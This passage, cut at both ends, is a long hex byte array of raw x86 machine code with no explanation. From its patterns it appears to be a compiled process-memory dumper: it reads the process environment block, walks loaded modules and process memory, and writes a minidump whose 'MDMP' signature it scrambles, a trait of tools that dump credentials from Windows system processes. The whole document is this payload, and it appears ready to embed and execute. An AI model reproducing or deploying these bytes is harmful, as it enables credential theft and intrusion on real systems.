,0x00,0x00,0x8B,0x45,0x08,0x89,0x45,0xE0,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x24,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x20,0x20,0x00,0x00,0x00,0xC7,0x44,0x24,0x1C,0x03,0x00,0x00,0x00,0xC7,0x44,0x24,0x18,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x14,0x80,0x00,0x00,0x00,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0x8D,0x45,0xD0,0x89,0x44,0x24,0x0C,0x8D,0x45,0xD8,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x89,0x00,0x12,0x00,0x8D,0x45,0xF0,0x89,0x04,0x24,0xE8,0xB9,0x14,0x00,0x00,0x89,0x45,0xF4,0x81,0x7D,0xF4,0x3A,0x00,0x00,0xC0,0x74,0x12,0x81,0x7D,0xF4,0x33,0x00,0x00,0xC0,0x74,0x09,0x81,0x7D,0xF4,0x3B,0x00,0x00,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x24,0x83,0x7D,0xF4,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x17,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x95,0x13,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x57,0x81,0xEC,0x44,0x02,0x00,0x00,0xB9,0x00,0x00,0x00,0x00,0xB8,0x18,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0xDC,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0x8D,0x95,0xD4,0xFD,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xB9,0x82,0x00,0x00,0x00,0x89,0xD7,0xF3,0xAB,0xC7,0x85,0xCC,0xFD,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xD0,0xFD,0xFF,0xFF,0x00,0x00,0x00,0x00,0x8D,0x85,0xD4,0xFD,0xFF,0xFF,0x89,0x85,0xD0,0xFD,0xFF,0xFF,0x83,0x7D,0x08,0x00,0x75,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x61,0x8B,0x45,0x08,0x89,0x44,0x24,0x04,0x8D,0x85,0xCC,0xFD,0xFF,0xFF,0x89,0x04,0x24,0xE8,0x24,0xFC,0xFF,0xFF,0xC7,0x45,0xDC,0x18,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x40,0x00,0x00,0x00,0x8D,0x85,0xCC,0xFD,0xFF,0xFF,0x89,0x45,0xE4,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x8D,0x45,0xDC,0x89,0x04,0x24,0xE8,0x9F,0x14,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x8B,0x7D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x57,0x81,0xEC,0x74,0x02,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB9,0x00,0x00,0x00,0x00,0xB8,0x18,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0xD8,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0x8D,0x95,0xC0,0xFD,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xB9,0x82,0x00,0x00,0x00,0x89,0xD7,0xF3,0xAB,0xC7,0x85,0xB8,0xFD,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xBC,0xFD,0xFF,0xFF,0x00,0x00,0x00,0x00,0x8D,0x85,0xC0,0xFD,0xFF,0xFF,0x89,0x85,0xBC,0xFD,0xFF,0xFF,0x83,0x7D,0x08,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xE0,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x44,0x24,0x04,0x8D,0x85,0xB8,0xFD,0xFF,0xFF,0x89,0x04,0x24,0xE8,0x2E,0xFB,0xFF,0xFF,0xC7,0x45,0xD8,0x18,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x40,0x00,0x00,0x00,0x8D,0x85,0xB8,0xFD,0xFF,0xFF,0x89,0x45,0xE0,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x24,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x20,0x20,0x00,0x00,0x00,0xC7,0x44,0x24,0x1C,0x01,0x00,0x00,0x00,0xC7,0x44,0x24,0x18,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x14,0x80,0x00,0x00,0x00,0x8D,0x45,0xC8,0x89,0x44,0x24,0x10,0x8D,0x45,0xD0,0x89,0x44,0x24,0x0C,0x8D,0x45,0xD8,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x89,0x00,0x12,0x00,0x8D,0x45,0xF0,0x89,0x04,0x24,0xE8,0x75,0x12,0x00,0x00,0x89,0x45,0xF4,0x81,0x7D,0xF4,0x43,0x00,0x00,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x34,0x81,0x7D,0xF4,0x34,0x00,0x00,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x24,0x83,0x7D,0xF4,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x17,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x53,0x11,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x8B,0x7D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x57,0x81,0xEC,0x74,0x02,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB9,0x00,0x00,0x00,0x00,0xB8,0x18,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0xD8,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0x8D,0x95,0xC0,0xFD,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xB9,0x82,0x00,0x00,0x00,0x89,0xD7,0xF3,0xAB,0xC7,0x85,0xB8,0xFD,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xBC,0xFD,0xFF,0xFF,0x00,0x00,0x00,0x00,0x8D,0x85,0xC0,0xFD,0xFF,0xFF,0x89,0x85,0xBC,0xFD,0xFF,0xFF,0x8B,0x45,0x08,0x89,0x44,0x24,0x04,0x8D,0x85,0xB8,0xFD,0xFF,0xFF,0x89,0x04,0x24,0xE8,0xC9,0xF9,0xFF,0xFF,0xC7,0x45,0xD8,0x18,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x40,0x00,0x00,0x00,0x8D,0x85,0xB8,0xFD,0xFF,0xFF,0x89,0x45,0xE0,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x24,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x20,0x01,0x00,0x00,0x00,0xC7,0x44,0x24,0x1C,0x02,0x00,0x00,0x00,0xC7,0x44,0x24,0x18,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x14,0x80,0x00,0x00,0x00,0x8D,0x45,0xC8,0x89,0x44,0x24,0x10,0x8D,0x45,0xD0,0x89,0x44,0x24,0x0C,0x8D,0x45,0xD8,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x89,0x00,0x12,0x00,0x8D,0x45,0xF0,0x89,0x04,0x24,0xE8,0x10,0x11,0x00,0x00,0x89,0x45,0xF4,0x81,0x7D,0xF4,0x35,0x00,0x00,0xC0,0x75,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x34,0x81,0x7D,0xF4,0x34,0x00,0x00,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x24,0x83,0x7D,0xF4,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x17,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0xEE,0x0F,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x8B,0x7D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x01,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x0C,0x00,0x00,0x00,0x8D,0x45,0xE8,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x28,0x00,0x00,0x00,0xC7,0x04,0x24,0xFF,0xFF,0xFF,0xFF,0xE8,0x9A,0x11,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0x83,0x7D,0x08,0x00,0x0F,0x84,0xA5,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x45,0xF4,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xEB,0x0C,0x83,0x45,0xF0,0x01,0x8B,0x45,0xF4,0x8B,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x75,0xEE,0x8B,0x45,0xF0,0x83,0xE8,0x01,0x89,0x45,0xEC,0xEB,0x71,0x8B,0x45,0x08,0x89,0x45,0xF4,0x8B,0x45,0xEC,0x89,0x45,0xE8,0xEB,0x08,0x8B,0x45,0xF4,0x8B,0x00,0x89,0x45,0xF4,0x8B,0x45,0xE8,0x8D,0x50,0xFF,0x89,0x55,0xE8,0x85,0xC0,0x75,0xEB,0x83,0x7D,0xF4,0x00,0x74,0x44,0x8B,0x45,0x0C,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xF4,0x89,0x04,0x24,0xE8,0xFD,0x4C,0x00,0x00,0xA1,0x08,0xE1,0x88,0x6C,0xFF,0xD0,0x8B,0x55,0xF4,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x10,0xE1,0x88,0x6C,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x83,0x6D,0xEC,0x01,0x83,0x7D,0xEC,0x00,0x79,0x89,0xEB,0x01,0x90,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x38,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x14,0x04,0x00,0x00,0x00,0xC7,0x44,0x24,0x10,0x00,0x10,0x00,0x00,0x8B,0x45,0x08,0x89,0x44,0x24,0x0C,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0x8D,0x45,0xF0,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0xFF,0xFF,0xFF,0xFF,0xE8,0x21,0x0F,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x03,0x8B,0x45,0xF0,0xC9,0xC3,0x55,0x89,0xE5,0x90,0x5D,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0x8B,0x45,0x08,0x85,0xC0,0x74,0x4F,0x8B,0x45,0x0C,0x85,0xC0,0x74,0x48,0x8B,0x55,0x0C,0x8B,0x45,0x08,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0x3C,0x4C,0x00,0x00,0xC7,0x45,0x0C,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x00,0x80,0x00,0x00,0x8D,0x45,0x0C,0x89,0x44,0x24,0x08,0x8D,0x45,0x08,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0xFF,0xFF,0xFF,0xFF,0xE8,0xD0,0x0E,0x00,0x00,0x89,0x45,0xF4,0xEB,0x01,0x90,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0x8D,0x45,0xF4,0x89,0x04,0x24,0xE8,0xB2,0xF3,0xFF,0xFF,0x89,0x04,0x24,0xE8,0x0A,0x4C,0x00,0x00,0x8B,0x45,0x08,0xC7,0x00,0x4D,0x44,0x4D,0x50,0x8B,0x45,0x0C,0x66,0xC7,0x00,0x93,0xA7,0x8B,0x45,0x10,0x66,0xC7,0x00,0x00,0x00,0xE9,0xDE,0x00,0x00,0x00,0x8B,0x45,0x08,0xC7,0x00,0x00,0x00,0x00,0x00,0xE8,0xCE,0x4B,0x00,0x00,0xC1,0xE0,0x11,0x89,0xC2,0x8B,0x45,0x08,0x8B,0x00,0x09,0xC2,0x8B,0x45,0x08,0x89,0x10,0xE8,0xB8,0x4B,0x00,0x00,0xC1,0xE0,0x02,0x25,0xFC,0xFF,0x01,0x00,0x89,0xC2,0x8B,0x45,0x08,0x8B,0x00,0x09,0xC2,0x8B,0x45,0x08,0x89,0x10,0xE8,0x9D,0x4B,0x00,0x00,0x83,0xE0,0x03,0x89,0xC2,0x8B,0x45,0x08,0x8B,0x00,0x09,0xC2,0x8B,0x45,0x08,0x89,0x10,0x8B,0x45,0x0C,0x66,0xC7,0x00,0x00,0x00,0xE8,0x7F,0x4B,0x00,0x00,0xC1,0xE0,0x08,0x25,0x00,0xFF,0x00,0x00,0x89,0xC2,0x8B,0x45,0x0C,0x0F,0xB7,0x00,0x89,0xC1,0x89,0xD0,0x09,0xC8,0x89,0xC2,0x8B,0x45,0x0C,0x66,0x89,0x10,0xE8,0x5C,0x4B,0x00,0x00,0x0F,0xB6,0xD0,0x8B,0x45,0x0C,0x0F,0xB7,0x00,0x89,0xC1,0x89,0xD0,0x09,0xC8,0x89,0xC2,0x8B,0x45,0x0C,0x66,0x89,0x10,0x8B,0x45,0x10,0x66,0xC7,0x00,0x00,0x00,0xE8,0x38,0x4B,0x00,0x00,0xC1,0xE0,0x08,0x25,0x00,0xFF,0x00,0x00,0x89,0xC2,0x8B,0x45,0x10,0x0F,0xB7,0x00,0x89,0xC1,0x89,0xD0,0x09,0xC8,0x89,0xC2,0x8B,0x45,0x10,0x66,0x89,0x10,0xE8,0x15,0x4B,0x00,0x00,0x0F,0xB6,0xD0,0x8B,0x45,0x10,0x0F,0xB7,0x00,0x89,0xC1,0x89,0xD0,0x09,0xC8,0x89,0xC2,0x8B,0x45,0x10,0x66,0x89,0x10,0x8B,0x45,0x08,0x8B,0x00,0x3D,0x4D,0x44,0x4D,0x50,0x0F,0x84,0x12,0xFF,0xFF,0xFF,0x8B,0x45,0x0C,0x0F,0xB7,0x00,0x66,0x3D,0x93,0xA7,0x0F,0x84,0x02,0xFF,0xFF,0xFF,0x8B,0x45,0x10,0x0F,0xB7,0x00,0x66,0x85,0xC0,0x0F,0x84,0xF3,0xFE,0xFF,0xFF,0x90,0x90,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x46,0x0E,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x90,0x5D,0xC3,0x55,0x89,0xE5,0x53,0x83,0xEC,0x34,0xC7,0x45,0xE8,0x00,0x02,0x00,0x00,0x8B,0x45,0xE8,0x89,0x45,0xF4,0x8B,0x45,0xE8,0x89,0x45,0xF4,0x8B,0x5D,0xE8,0xA1,0x08,0xE1,0x88,0x6C,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x0C,0xE1,0x88,0x6C,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xA4,0x00,0x00,0x00,0x8B,0x45,0xE8,0x8D,0x55,0xE8,0x89,0x54,0x24,0x10,0x89,0x44,0x24,0x0C,0x8B,0x45,0xF0,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x1B,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x46,0x0C,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x78,0x17,0x8B,0x45,0x0C,0x8B,0x55,0xF0,0x89,0x10,0x8B,0x55,0xE8,0x8B,0x45,0x10,0x89,0x10,0xB8,0x01,0x00,0x00,0x00,0xEB,0x5C,0x83,0x7D,0xF0,0x00,0x74,0x44,0x8B,0x45,0xF4,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0xCD,0x49,0x00,0x00,0xA1,0x08,0xE1,0x88,0x6C,0xFF,0xD0,0x8B,0x55,0xF0,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x10,0xE1,0x88,0x6C,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x81,0x7D,0xEC,0x04,0x00,0x00,0xC0,0x0F,0x84,0x25,0xFF,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0x8B,0x5D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x18,0x00,0x00,0x00,0x8D,0x45,0xD8,0x89,0x44,0x24,0x08,0x8B,0x45,0xF4,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x88,0x0B,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x03,0x8B,0x45,0xE8,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x58,0xB9,0x00,0x00,0x00,0x00,0xB8,0x1C,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0xD4,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x1C,0x00,0x00,0x00,0x8D,0x45,0xD4,0x89,0x44,0x24,0x08,0x8B,0x45,0xF4,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xEB,0x10,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x03,0x8B,0x45,0xE0,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x10,0xC7,0x45,0xFC,0x30,0x00,0x00,0x00,0x8B,0x45,0xFC,0x64,0x8B,0x00,0x89,0x45,0xF8,0x8B,0x45,0xF8,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x48,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xD4,0xFF,0xFF,0xFF,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xAE,0x00,0x00,0x00,0x8B,0x45,0xF4,0x83,0xC0,0x0C,0x89,0x45,0xF0,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x04,0x00,0x00,0x00,0x8D,0x45,0xE4,0x89,0x44,0x24,0x08,0x8B,0x45,0xF0,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x2E,0x0A,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x79,0x0D,0x83,0x7D,0x0C,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x5F,0x83,0x7D,0xEC,0x00,0x79,0x0D,0x83,0x7D,0x0C,0x00,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x4C,0x8B,0x45,0xE4,0x83,0xC0,0x0C,0x89,0x45,0xE8,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x04,0x00,0x00,0x00,0x8D,0x45,0xE0,0x89,0x44,0x24,0x08,0x8B,0x45,0xE8,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xCC,0x09,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x03,0x8B,0x45,0xE0,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x38,0xA1,0x08,0xE1,0x88,0x6C,0xFF,0xD0,0xC7,0x44,0x24,0x08,0x20,0x02,0x00,0x00,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x0C,0xE1,0x88,0x6C,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xA3,0x00,0x00,0x00,0x8B,0x45,0xF4,0xC7,0x00,0x00,0x00,0x00,0x00,0x8B,0x45,0x0C,0x8B,0x40,0x18,0xBA,0x00,0x00,0x00,0x00,0x8B,0x4D,0xF4,0x89,0x41,0x08,0x89,0x51,0x0C,0x8B,0x45,0x0C,0x8B,0x50,0x20,0x8B,0x45,0xF4,0x89,0x50,0x10,0x8B,0x45,0x0C,0x8B,0x50,0x44,0x8B,0x45,0xF4,0x89,0x90,0x18,0x02,0x00,0x00,0x8B,0x45,0x0C,0x8B,0x90,0xB0,0x00,0x00,0x00,0x8B,0x45,0xF4,0x89,0x90,0x1C,0x02,0x00,0x00,0x8B,0x45,0x0C,0x0F,0xB7,0x40,0x24,0xBA,0x00,0x02,0x00,0x00,0x66,0x39,0xD0,0x0F,0x47,0xC2,0x0F,0xB7,0xC0,0x89,0x45,0xF0,0x8B,0x45,0xF4,0x8D,0x48,0x14,0x8B,0x45,0x0C,0x8B,0x40,0x28,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0x8B,0x55,0xF0,0x89,0x54,0x24,0x0C,0x89,0x4C,0x24,0x08,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xEA,0x08,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x03,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x38,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0xB8,0x00,0x00,0x00,0x8B,0x45,0x10,0x89,0x44,0x24,0x08,0x8B,0x45,0x0C,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xA6,0x08,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x62,0xC7,0x44,0x24,0x08,0x04,0x01,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0x14,0x89,0x04,0x24,0xE8,0xA5,0x46,0x00,0x00,0x8B,0x45,0x10,0x0F,0xB7,0x40,0x2C,0x0F,0xB7,0xD0,0x8B,0x45,0x10,0x8B,0x40,0x30,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0x89,0x54,0x24,0x0C,0x8B,0x55,0x14,0x89,0x54,0x24,0x08,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x49,0x08,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x81,0xEC,0x08,0x03,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x8B,0x45,0x14,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x85,0xFD,0xFF,0xFF,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x73,0x01,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x66,0xC7,0x45,0xEA,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xE9,0x34,0x01,0x00,0x00,0x8D,0x85,0x10,0xFD,0xFF,0xFF,0x89,0x44,0x24,0x0C,0x8D,0x85,0x18,0xFF,0xFF,0xFF,0x89,0x44,0x24,0x08,0x8B,0x45,0xF0,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xE9,0xFE,0xFF,0xFF,0x89,0x45,0xD8,0x83,0x7D,0xD8,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x21,0x01,0x00,0x00,0x83,0x7D,0xEC,0x00,0x75,0x09,0x8B,0x85,0x1C,0xFF,0xFF,0xFF,0x89,0x45,0xEC,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xE9,0xC3,0x00,0x00,0x00,0x8B,0x45,0xE0,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x8B,0x45,0x0C,0x01,0xD0,0x8B,0x00,0x8D,0x95,0x10,0xFD,0xFF,0xFF,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xA1,0x48,0xE1,0x88,0x6C,0xFF,0xD0,0x85,0xC0,0x0F,0x85,0x92,0x00,0x00,0x00,0x8B,0x45,0xE0,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x8B,0x45,0x0C,0x01,0xD0,0x8B,0x00,0xC7,0x44,0x24,0x04,0x50,0x80,0x88,0x6C,0x89,0x04,0x24,0xA1,0x48,0xE1,0x88,0x6C,0xFF,0xD0,0x85,0xC0,0x75,0x07,0xC7,0x45,0xE4,0x01,0x00,0x00,0x00,0x8D,0x85,0x18,0xFF,0xFF,0xFF,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x69,0xFD,0xFF,0xFF,0x89,0x45,0xD4,0x83,0x7D,0xD4,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x83,0x00,0x00,0x00,0x83,0x7D,0xF4,0x00,0x75,0x08,0x8B,0x45,0xD4,0x89,0x45,0xF4,0xEB,0x21,0x8B,0x45,0xF4,0x89,0x45,0xDC,0xEB,0x08,0x8B,0x45,0xDC,0x8B,0x00,0x89,0x45,0xDC,0x8B,0x45,0xDC,0x8B,0x00,0x85,0xC0,0x75,0xEF,0x8B,0x45,0xDC,0x8B,0x55,0xD4,0x89,0x10,0x0F,0xB7,0x45,0xEA,0x83,0xC0,0x01,0x66,0x89,0x45,0xEA,0xEB,0x10,0x83,0x45,0xE0,0x01,0x8B,0x45,0xE0,0x3B,0x45,0x10,0x0F,0x8C,0x31,0xFF,0xFF,0xFF,0x8B,0x85,0x18,0xFF,0xFF,0xFF,0x89,0x45,0xF0,0x8B,0x4